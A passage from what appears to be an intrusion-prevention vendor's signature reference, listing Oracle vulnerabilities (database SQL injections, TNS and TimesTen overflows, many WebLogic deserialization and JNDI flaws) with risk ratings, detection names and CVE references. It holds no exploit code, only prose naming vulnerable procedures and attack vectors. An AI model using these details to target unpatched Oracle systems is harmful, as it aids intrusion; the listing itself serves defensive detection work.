There exists a SQL injection vulnerability in the Oracle Database products. The flaw can be triggered by a crafted call to the MDSYS.SDO_LRS package function convert_to_lrs_layer, resulting in execution of privileged SQL statements. The attacker must have the necessary privileges to create PL/SQL functions on the target server in order to trigger the vulnerability. A successful exploit allows the attacker to read and modify the contents of the database.

Situation:

Generic_Oracle-SQL-Database-Compromise
TNS_Oracle-SQL-Database-Compromise

References:

CVE-2006-5340
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5340

BID-20622
http://www.securityfocus.com/bid/20622

OSVDB-29832
http://www.osvdb.org/29832

Oracle-Sys-Pbsde-Init-BOF

About this vulnerability:

Buffer overflow in Oracle sys.pbsde.init procedure

Risk:

High

First detected in:

sgpkg-ips-45-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle 9i; Oracle 10g

Type:

Buffer Overflow

Description:

The Oracle database server ships with a package of stored procedures called pbsbe. There is a possibility of a buffer overflow in the package's init procedure, which does not handle correctly a large third argument. A successful exploit allows remote attackers to execute arbitrary code with System privileges on Windows platforms, and with the Oracle user privileges on Unix based platforms. Regular database users should not be able to call the vulnerable procedure, but the procedure is executed before resolving privileges, allowing any authenticated user to exploit the vulnerability.

Situation:

SMB-TCP_Oracle-Sys-Pbsde-Init-BOF
Generic_Oracle-Sys-Pbsde-Init-BOF
TNS_Oracle-Sys-Pbsde-Init-BOF

References:

CVE-2005-3438
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3438

BID-5134
http://www.securityfocus.com/bid/5134

Oracle-TimesTen-Evtdump-Format-Strings-Vulnerability

About this vulnerability:

Oracle TimesTen evtdump format strints vulnerability

Risk:

High

First detected in:

sgpkg-ips-200-2032

Last changed:

sgpkg-ips-1589-5242

Platform:

Generic

Software:

Oracle TimesTen

Type:

Format String

Description:

There is a format string error vulnerability in TimesTen In-memory Database. The flaw is due to a input error when processing HTTP requests sent to CGI program evtdump. Remote authenticated attackers can exploit this vulnerability by sending specially crafted messages to the affected interface. A successful exploitation can lead to arbitrary code execution with System level privileges. In an attack case where code injection is not successful, the affected process will terminate abnormally. In a more sophisticated attack where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected process with System level privileges

Situation:

HTTP_CSU-Oracle-TimesTen-Format-Strings-Vulnerability-2

References:

CVE-2008-5440
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5440

BID-33177
http://www.securityfocus.com/bid/33177

Oracle-TimesTen-In-Memory-Database-HTTP-Request-Denial-Of-Service

About this vulnerability:	A vulnerability in Oracle TimesTen In-Memory Database
Risk:	Moderate
First detected in:	sgpkg-ips-285-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Oracle TimesTen
Type:	Buffer Overflow
Description:	A denial of service vulnerability exists in Oracle TimesTen In-Memory Database service. The vulnerability is due to an input validation error while parsing HTTP GET requests. Remote unauthenticated attackers can exploit this vulnerability by sending a specially crafted HTTP request to the timestend daemon listening on port 17000/TCP. Successful exploitation would cause the database service to terminate abnormally, resulting in the Denial of Service condition.
Situation:	HTTP_CSU-Oracle-TimesTen-In-Memory-Database-HTTP-Request-Denial-Of-Service

Oracle-TNS-Service-Name-BOF

About this vulnerability:

Buffer overflow in Oracle TNS listener

Risk:

High

First detected in:

sgpkg-ips-402-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle 8i; Oracle 9i

Type:

Buffer Overflow

Description:

Oracle is vulnerable to a buffer overflow in the Transparent Network Substrate (TNS) Listener.

Situation:

TNS_Oracle-TNS-Service-Name-BOF

References:

CVE-2002-0965
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0965

BID-4845
http://www.securityfocus.com/bid/4845

OSVDB-5041
http://www.osvdb.org/5041

Oracle-Tuxedo-Jolt-Protocol-CVE-2017-10272-Information-Disclosure

About this vulnerability:

A vulnerability in Oracle Tuxedo

Risk:

Moderate

First detected in:

sgpkg-ips-1023-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Tuxedo

Type:

Malfunction

Description:

Improper handling of protocol messages in Oracle Tuxedo causes an information disclosure vulnerability. A successful exploit may allow sensitive data to be leaked.

Situation:

Generic_CS-Oracle-Tuxedo-Jolt-Protocol-CVE-2017-10272-Information-Disclosure

References:

CVE-2017-10272
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10272

Oracle-Tuxedo-Jolt-Protocol-CVE-2017-10278-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle Tuxedo

Risk:

Moderate

First detected in:

sgpkg-ips-1020-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Tuxedo

Type:

Buffer Overflow

Description:

Improper handling of client-sent requests causes a heap buffer overflow vulnerability in Oracle Tuxedo. A successful exploit allows an attacker to execute arbitrary code with the privileges of the affected process.

Situation:

Generic_CS-Oracle-Tuxedo-Jolt-Protocol-CVE-2017-10278-Heap-Buffer-Overflow

References:

CVE-2017-10278
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10278

Oracle-Virtual-Server-Agent-Command-Injection

About this vulnerability:

A vulnerability in Oracle VM

Risk:

High

First detected in:

sgpkg-ips-375-4219

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

Oracle Virtual Server

Type:

Input Validation

Description:

A command injection vulnerability exists in Oracle VM. The vulnerability is due to an input validation error in proxy parameters of utl_test_url function in Oracle VM Agent when processing XML-RPC requests. A remote authenticated attacker can exploit this vulnerabilities to inject and execute arbitrary commands.

Situation:

HTTP_CS-Oracle-Virtual-Server-Agent-Command-Injection

References:

CVE-2010-3582
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3582

BID-44031
http://www.securityfocus.com/bid/44031

Oracle-Warehouse-Builder-WB_OLAP-SQL-Injection

About this vulnerability:

Attempt to explot a vulnerability in Oracle Warehouse Builder

Risk:

Moderate

First detected in:

sgpkg-ips-405-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Warehouse Builder

Type:

SQL Injection

Description:

Oracle Warehouse Builder (OWB), a component of the Oracle Database contains an SQL injection vulnerability. The vulnerability is due to improper input validation in the OWBREPOS_OWNER.WB_OLAP_AW_REMOVE_SOLVE_ID procedure.

Situation:

TNS_Oracle-Oracle-Warehouse-Builder-WB_OLAP-SQL-Injection

References:

CVE-2011-0799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0799

BID-47431
http://www.securityfocus.com/bid/47431

OSVDB-71956
http://www.osvdb.org/71956

Oracle-Warehouse-Builder-WB_RT-Multiple-SQL-Injections

About this vulnerability:

An attempt to exploit vulnerability in Oracle Warehouse Builder detected

Risk:

Moderate

First detected in:

sgpkg-ips-405-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Warehouse Builder

Type:

SQL Injection

Description:

Oracle Warehouse Builder, a component of Oracle Database, contains multiple SQL injection vulnerabilities. The vulnerabilities are due to improper input validation in various procedures in the OWBREPOS_OWNER.WB_RT_AUDIT_SHADOW_TABLE package. Remote authenticated attackers with role OWB_O_OWBERPOS_OWNER can exploit these vulnerabilities by sending a specially crafted parameter to the affected procedures.

Situation:

TNS_Oracle-Oracle-Warehouse-Builder-WB_RT-Multiple-SQL-Injections

References:

CVE-2011-0799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0799

BID-47431
http://www.securityfocus.com/bid/47431

OSVDB-71956
http://www.osvdb.org/71956

Oracle-Web-Cache-Unspecified-Client-Request-Handling

About this vulnerability:

A vulnerability in Oracle Application Server Web Cache

Risk:

Moderate

First detected in:

sgpkg-ips-598-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Application Server

Type:

Input Validation

Description:

The Oracle Web Cache contains several vulnerabilities. These vulnerabilities enable attackers to falsify log data, to perform Cross-Site Scripting attacks against administrators reviewing the Web Cache log files, to perform a denial of service, and to execute web requests which are not visible in the log.

Situation:

Generic_CS-Oracle-Web-Cache-Unspecified-Client-Request-Handling-2
Generic_CS-Oracle-Web-Cache-Unspecified-Client-Request-Handling-1
HTTP_CSH-Oracle-Web-Cache-Unspecified-Client-Request-Handling-1

References:

CVE-2004-0385
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0385

BID-9868
http://www.securityfocus.com/bid/9868

OSVDB-4249
http://www.osvdb.org/4249

Oracle-Webcenter-Content-Checkoutandopen.dll-ActiveX-Control-Code-Execution

About this vulnerability:

A vulnerability in Oracle WebCenter Content

Risk:

Moderate

First detected in:

sgpkg-ips-536-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebCenter Content

Type:

Input Validation

Description:

There is a remote code execution vulnerability in Oracle WebCenter Content. The vulnerability is due to insufficient validation of parameters used in the coao() and openWebdav() methods of the CheckOutAndOpen.Control ActiveX control. A remote attacker could possibly exploit this vulnerability to achieve arbitrary code execution by enticing a target user to open a crafted web page.

Situation:

File-Text_Oracle-Webcenter-Content-Checkoutandopen.dll-ActiveX-Code-Execution

References:

CVE-2013-1559
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1559

BID-59122
http://www.securityfocus.com/bid/59122

OSVDB-92386
http://www.osvdb.org/92386

Oracle-Webcenter-Forms-Recognition-ActiveX-Control-Arbitrary-File-Creation

About this vulnerability:

A vulnerability in Oracle WebCenter Forms Recognition

Risk:

Moderate

First detected in:

sgpkg-ips-451-4333

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebCenter Forms Recognition

Type:

Directory Traversal

Description:

There is a directory traversal vulnerability in Oracle WebCenter Forms Recognition. The vulnerability is due to insufficient validation of parameters used in the Save() method in the ActiveX control CroProj.dll. This can be exploited to write arbitrary files in the context of the currently logged-on user. A remote attacker could possibly exploit this vulnerability to achieve arbitrary code execution by enticing a target user to open a crafted web page.

Situation:

File-Text_Oracle-Webcenter-Forms-Recognition-ActiveX-File-Creation

References:

CVE-2012-1709
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1709

OSVDB-81367
http://www.osvdb.org/81367

Oracle-Webcenter-Forms-Recognition-Sssplt30.ocx-ActiveX-Vulnerability

About this vulnerability:

A vulnerability in Oracle WebCenter Forms Recognition

Risk:

Moderate

First detected in:

sgpkg-ips-450-4333

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebCenter Forms Recognition

Type:

Directory Traversal

Description:

There is a directory traversal vulnerability in Oracle WebCenter Forms Recognition. The vulnerability is due to insufficient validation of parameters used in the SaveLayout() method in the ActiveX control Sssplt30.ocx. This can be exploited to write arbitrary files in the context of the currently logged-on user. A remote attacker could possibly exploit this vulnerability to achieve arbitrary code execution by enticing a target user to open a crafted web page.

Situation:

File-Text_Oracle-Webcenter-Forms-Recognition-Sssplt30.ocx-ActiveX-Vulnerability

References:

CVE-2012-1710
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1710

OSVDB-81366
http://www.osvdb.org/81366

Oracle-WebLogic-CVE-2019-2725-Insecure-Deserialization

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

Moderate

First detected in:

sgpkg-ips-1156-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

Insufficient validation of XML data within the body of HTTP POST requests causes a desrerialization vulnerability in Oracle WebLogic. A successful exploit may allow an attacker to run arbitrary code on the target server.

Situation:

File-TextId_Oracle-WebLogic-CVE-2019-2725-Insecure-Deserialization

References:

CVE-2019-2725
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2725

Oracle-WebLogic-CVE-2019-2729-Insecure-Deserialization

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

Moderate

First detected in:

sgpkg-ips-1173-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

There has been reported a vulnerability in Oracle Weblogic. This vulnerability could be exploited remotely without authentication. Successful exploitation might lead in arbitrary code execution.

Situation:

HTTP_CRL-Oracle-WebLogic-CVE-2019-2729-Insecure-Deserialization

References:

CVE-2019-2729
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2729

Oracle-WebLogic-CVE-2019-2890-Insecure-Deserialization

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

Moderate

First detected in:

sgpkg-ips-1205-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

There exist a post-auth deserialization vulnerability in Oracle Weblogic. Successful exploitation could lead in arbitrary code execution.

Situation:

Generic_CS-Oracle-WebLogic-CVE-2019-2890-Insecure-Deserialization

References:

CVE-2019-2890
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2890

Oracle-WebLogic-CVE-2020-14625-Insecure-Deserialization

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

Moderate

First detected in:

sgpkg-ips-1274-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

There exists an insecure deserialization vulnerability in Oracle Weblogic. Successful exploitation could lead in arbitrary code execution.

Situation:

Generic_TCP-Oracle-WebLogic-CVE-2020-14625-Insecure-Deserialization

References:

CVE-2020-14625
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14625

Oracle-WebLogic-CVE-2020-14644-Insecure-Deserialization

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

Moderate

First detected in:

sgpkg-ips-1274-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

There exists an insecure deserialization vulnerability in Oracle Weblogic. Successful exploitation could lead in arbitrary code execution.

Situation:

Generic_TCP-Oracle-WebLogic-CVE-2020-14644-Insecure-Deserialization

References:

CVE-2020-14644
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14644

Oracle-WebLogic-CVE-2020-14841-IIOP-JNDI-Injection

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

High

First detected in:

sgpkg-ips-1298-5242

Last changed:

sgpkg-ips-1298-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

A JNDI injection vulnerability has been reported in Oracle WebLogic. This vulnerability is due to improper handling of specific IIOP protocol messages. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to a vulnerable server. Successful exploitation results in the target server retrieving a potentially malicious serialized object from an attacker controlled server which may lead to the execution of arbitrary code under the security context of the affected server.

Situation:

Generic_TCP-Oracle-WebLogic-CVE-2020-14841-IIOP-JNDI-Injection

References:

CVE-2020-14841
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14841

Oracle-WebLogic-CVE-2020-2551-Insecure-Deserialization

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

Moderate

First detected in:

sgpkg-ips-1226-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

There has been reported a pre-auth insecure deserialization vulnerability in Oracle Weblogic. Successful exploitation could lead in arbitrary code execution.

Situation:

Generic_CS-Oracle-WebLogic-CVE-2020-2551-Insecure-Deserialization

References:

CVE-2020-2551
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2551

Oracle-WebLogic-CVE-2020-2798-Insecure-Deserialization

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

Moderate

First detected in:

sgpkg-ips-1246-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

There has been reported an insecure deserialization vulnerability in Oracle WebLogic. Successful exploitation could lead in arbitrary code execution.

Situation:

Generic_CS-Oracle-WebLogic-CVE-2020-2798-Insecure-Deserialization

References:

CVE-2020-2798
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2798

Oracle-WebLogic-CVE-2020-2883-Insecure-Deserialization

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

Moderate

First detected in:

sgpkg-ips-1252-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

Insufficient validation of T3 requests causes an insecure deserialization vulnerability in Oracle Weblogic Server. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

Generic_CS-Oracle-WebLogic-CVE-2020-2883-Insecure-Deserialization

References:

CVE-2020-2883
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2883

Oracle-WebLogic-CVE-2020-2884-Insecure-Deserialization

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

Moderate

First detected in:

sgpkg-ips-1252-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

Insufficient validation of T3 requests causes an insecure deserialization vulnerability in Oracle WebLogic Server. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

Generic_CS-Oracle-WebLogic-CVE-2020-2884-Insecure-Deserialization

References:

CVE-2020-2884
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2884

Oracle-WebLogic-CVE-2020-2963-Insecure-Deserialization

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

Moderate

First detected in:

sgpkg-ips-1248-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

Insufficient validation of requests causes an insecure deserialization vulnerability in Oracle WebLogic. A successful attack may allow an attacker to execute arbitrary code on the target system.

Situation:

Generic_CS-Oracle-WebLogic-CVE-2020-2963-Insecure-Deserialization

References:

CVE-2020-2963
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2963

Oracle-WebLogic-Ejbtaglibdescriptor-External-Entity-Injection

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

Moderate

First detected in:

sgpkg-ips-1202-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

There exists an XXE vulnerability in Oracle Weblogic. This vulnerability could be remotely exploited. Successful exploitation could lead in the disclosure of file contents.

Situation:

Generic_CS-Oracle-WebLogic-Ejbtaglibdescriptor-External-Entity-Injection

References:

CVE-2019-2888
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2888

Oracle-WebLogic-Foreignrecoverycontext-External-Entity-Injection

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

Moderate

First detected in:

sgpkg-ips-1166-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

There has been reported an XXE vulnerability in Oracle Weblogic. This vulnerability could be exploited by sending a malicious request to the target server. Successful exploitation could lead in information disclosure.

Situation:

Generic_CS-Oracle-WebLogic-Foreignrecoverycontext-External-Entity-Injection

References:

CVE-2019-2647
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2647

Oracle-WebLogic-Insecure-Deserialization-CVE-2021-2394

About this vulnerability:

An attempt to exploit a vulnerability in Oracle WebLogic

Risk:

High

First detected in:

sgpkg-ips-1435-5242

Last changed:

sgpkg-ips-1435-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

There exists an insecure deserialization vulnerability in Oracle WebLogic. Successful exploitation could allow an unauthenticated attacker to execute arbitrary code on the vulnerable server.

Situation:

Generic_CS-Oracle-WebLogic-Insecure-Deserialization-CVE-2021-2394

References:

CVE-2021-2394
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2394

Oracle-WebLogic-Limitfilter-Insecure-Deserialization

About this vulnerability:

A vulnerability in Oracle Coherence

Risk:

Moderate

First detected in:

sgpkg-ips-1233-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Coherence; Oracle WebLogic Server

Type:

Input Validation

Description:

There has been reported an insecure deserialization vulnerability in Oracle Weblogic. Successful exploitation could lead in arbitrary code execution on target server.

Situation:

Generic_CS-Oracle-WebLogic-Limitfilter-Insecure-Deserialization

References:

CVE-2020-2555
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2555

Oracle-WebLogic-Remote-Diagnosis-Assistant-Command-Injection

About this vulnerability:

A vulnerability in Oracle Diagnosis Assistant

Risk:

Moderate

First detected in:

sgpkg-ips-1042-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Diagnosis Assistant

Type:

Input Validation

Description:

Improper handling of HTTP requests causes a command injection vulnerability in Oracle Diagnosis Assistant. A successful exploit allows an attacker to execute arbitrary commands on the target system.

Situation:

HTTP_CRL-Oracle-WebLogic-Remote-Diagnosis-Assistant-Command-Injection

References:

CVE-2018-2616
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2616

Oracle-WebLogic-Remote-Diagnosis-Assistant-Rda_tfa_Ref_Date-Command-Injection

About this vulnerability:

A vulnerability in Oracle Diagnosis Assistant

Risk:

Moderate

First detected in:

sgpkg-ips-1075-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Diagnosis Assistant

Type:

Input Validation

Description:

There has been reported a command injection vulnerability in the web console of the Oracle WebLogic Remote Diagnosis Assistant. A remote, authenticated attacker can exploit this vulnerability by sending a maliciously crafted request to the target server. Successful exploitation can lead to arbitrary command execution.

Situation:

HTTP_CSU-Oracle-WebLogic-Remote-Diagnosis-Assistant-Rda_tfa_Ref_Date-Command-Injection

References:

CVE-2018-2615
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2615

Oracle-WebLogic-Server-AbsPlatTransManager-Insecure-Deserialization

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

High

First detected in:

sgpkg-ips-1117-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in Oracle WebLogic Server. This vulnerability is due to deserialization of untrusted data contained within T3 requests. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted serialized object. Successful exploitation can result in arbitrary code execution in the context of the user account running WebLogic.

Situation:

Generic_CS-Oracle-WebLogic-Server-AbsPlatTransManager-Insecure-Deserialization

References:

CVE-2018-3191
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3191

Oracle-WebLogic-Server-Admin-Console-War-Deployment

About this vulnerability:	A vulnerability in Oracle WebLogic Server
Risk:	High
First detected in:	sgpkg-ips-1196-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Oracle WebLogic Server
Type:	Malfunction
Description:	A vulnerability in WebLogic Server Administration Console 12 and prior, which allows remote attackers to install malicious Java applications and execute arbitrary code.
Situation:	HTTP_CRL-Oracle-WebLogic-Server-Admin-Console-War-Deployment

Oracle-WebLogic-Server-Aqjmsinitialcontextfactory-JNDI-Injection

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

High

First detected in:

sgpkg-ips-1698-5242

Last changed:

sgpkg-ips-1698-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

An information disclosure vulnerability has been reported in Oracle WebLogic Server. This vulnerability is due to improper handling user supplied data in AQjmsInitialContextFactory class leading to an JNDI injection. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to a vulnerable server. Successful exploitation results in the target server performing a JNDI lookup to an attacker controlled server, and in the worst case execution of arbitrary code under the security context of the affected service.

Situation:

Generic_CS-Oracle-WebLogic-Server-Aqjmsinitialcontextfactory-JNDI-Injection

References:

CVE-2024-20931
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20931

Oracle-WebLogic-Server-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

High

First detected in:

sgpkg-ips-1138-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

A vulnerability in Oracle WebLogic Server, versions 10.3.6.0, 12.1.3.0, 12.2.1.2, and 12.2.1.3, which allows remote attcakers to upload arbitrary files and execute code due to the lack of input validation of keystore files.

Situation:

HTTP_CS-Oracle-WebLogic-Server-Arbitrary-File-Upload

References:

CVE-2018-2894
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2894

Oracle-WebLogic-Server-Commons-Collections-Library-Insecure-Deserialization

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

High

First detected in:

sgpkg-ips-709-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Malfunction

Description:

An insecure deserialization vulnerability has been reported in Oracle WebLogic Server. This vulnerability is due to deseralization of untrusted data while having the vulnerable version of Apache Commons-Collections library in the code path. A remote, unauthenticated attacker can exploit this vulnerability by sending a request message that contains a specially crafted serialized object. Successful exploitation can result in arbitrary code execution in the security context of the System user.

Situation:

Generic_CS-Oracle-WebLogic-Server-Commons-Collections-Library-Insecure-Deserialization

References:

CVE-2015-4852
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4852

Oracle-WebLogic-Server-CVE-2020-14825

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

High

First detected in:

sgpkg-ips-1297-5242

Last changed:

sgpkg-ips-1297-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

There exists an insecure deserialization vulnerability in Oracle Weblogic. Successful exploitation could lead in arbitrary code execution.

Situation:

Generic_TCP-Oracle-WebLogic-CVE-2020-14825-Insecure-Deserialization

References:

CVE-2020-14825
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14825

Oracle-WebLogic-Server-CVE-2020-14882

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

High

First detected in:

sgpkg-ips-1293-5242

Last changed:

sgpkg-ips-1408-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

A remote code execution vulnerability has been reported in Oracle WebLogic Server. This vulnerability is due to improper sanitization of user-supplied data via HTTP. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a vulnerable server. Successful exploitation can result in arbitrary code execution under the security context of the affected server. This situation also covers the the exploit attempts of the vulnerability CVE-2020-14750 and CVE-2020-14883.

Situation:

HTTP_CRL-Oracle-WebLogic-Server-CVE-2020-14882

References:

CVE-2020-14882
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14882

Oracle-WebLogic-Server-CVE-2021-2109-JNDI-Injection

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

High

First detected in:

sgpkg-ips-1320-5242

Last changed:

sgpkg-ips-1320-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

A JNDI injection vulnerability has been reported in Oracle Weblogic Server. This vulnerability is due to improper handling user supplied data. A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to a vulnerable server. Successful exploitation results in the target server retrieving a potentially malicious serialized object from an attacker controlled server which may lead to the execution of arbitrary code under the security context of the affected server.

Situation:

HTTP_CRL-Oracle-WebLogic-Server-CVE-2021-2109-JNDI-Injection

References:

CVE-2021-2109
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2109

Oracle-WebLogic-Server-Deploymentservice-Directory-Traversal

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

Moderate

First detected in:

sgpkg-ips-1153-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Directory Traversal

Description:

There has been reported a directory traversal vulnerability in Oracle WebLogic Server. This vulnerability is remotely exploitable. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CS-Oracle-WebLogic-Server-Deploymentservice-Directory-Traversal

References:

CVE-2019-2618
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2618

Oracle-WebLogic-Server-DeploymentServiceServlet-Insecure-Deserialization

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

High

First detected in:

sgpkg-ips-1119-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in Oracle WebLogic Server. This vulnerability is due to deserialization of untrusted data contained within HTTP requests by DeploymentServiceServlet. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted serialized object. Successful exploitation can result in arbitrary code execution in the context of the user account running WebLogic.

Situation:

HTTP_CS-Oracle-WebLogic-Server-DeploymentServiceServlet-Insecure-Deserialization

References:

CVE-2018-3252
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3252

Oracle-WebLogic-Server-Deserialization-RCE

About this vulnerability:

A vulnerability in Oracle Weblogic Server

Risk:

High

First detected in:

sgpkg-ips-1196-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Input Validation

Description:

A vulnerability in Oracle Weblogic Server T3 which allows remote attackers to execute arbitrary code by sending a malicious SOAP request to the interface WLS AsyncResponseService.

Situation:

HTTP_CRL-Oracle-WebLogic-Server-Deserialization-RCE

References:

CVE-2017-10271
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271

Oracle-WebLogic-Server-Deserialization-Remote-Command-Execution-Vulnerability

About this vulnerability:

A vulnerability in Oracle WebLogic Server

Risk:

High

First detected in:

sgpkg-ips-1067-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

